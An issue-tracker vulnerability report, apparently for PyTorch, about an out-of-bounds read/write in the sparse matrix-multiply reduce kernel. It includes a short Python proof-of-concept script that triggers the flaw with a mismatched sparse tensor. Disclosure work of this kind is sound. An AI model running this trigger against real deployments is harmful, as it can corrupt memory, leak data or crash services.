-
Bug
-
Resolution: Obsolete
-
Undefined
-
None
-
None
-
None
-
False
-
-
False
-
-
Vulnerability Type: Out-of-Bounds Read/Write (CWE-119, CWE-125, CWE-787)
Location:
- File: aten/src/ATen/native/cpu/SpmmReduceKernel.cpp
- Line: 60
Details:
The _update function computes other_ptr = other_data + c * K where c comes from col_indices[e] without bounds checking. If c >= other.size(0), this results in an out-of-bounds pointer. At line 60-61, the code dereferences this out-of-bounds pointer causing both out-of-bounds read and write operations.
Vulnerability chain:
1. Line 131: int64_t c = col_data[e] - read column index
2. Line 133: _update is called with c
3. Line 36 in _update: const scalar_t* other_ptr = other_data + c * K - OOB pointer calculation
4. Line 44-61: Multiple dereferences of other_ptr[k] - OOB read/write
Impact:
- Memory corruption through out-of-bounds write at line 62
- Information disclosure through out-of-bounds read at line 60
- Potential code execution if attacker controls memory layout
- Denial of service through segmentation fault
- Can leak sensitive data from adjacent memory
- Can corrupt adjacent data structures
Exploit Code (first 50 lines):
#!/usr/bin/env python3 import torch import sys def exploit_buffer_overflow(): print("CVE Exploit: Out-of-Bounds Memory Access in torch.sparse.mm()") print("Location: aten/src/ATen/native/cpu/SpmmReduceKernel.cpp:60") # Create dimension mismatch crow_indices = torch.tensor([0, 1] + [1] * 9, dtype=torch.int64) col_indices = torch.tensor([5], dtype=torch.int64) values = torch.tensor([1.0], dtype=torch.float32) sparse_matrix = torch.sparse_csr_tensor( crow_indices=crow_indices, col_indices=col_indices, values=values, size=(10, 10), dtype=torch.float32, device='cpu' ) dense_matrix = torch.randn(3, 4, dtype=torch.float32, device='cpu') result = torch.sparse.mm(sparse_matrix, dense_matrix, reduce='sum')
Severity: High
CVSS Score: 8.5 (AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Source File: /pytorch/results/exploit_cve2_buffer_overflow_spmm.py
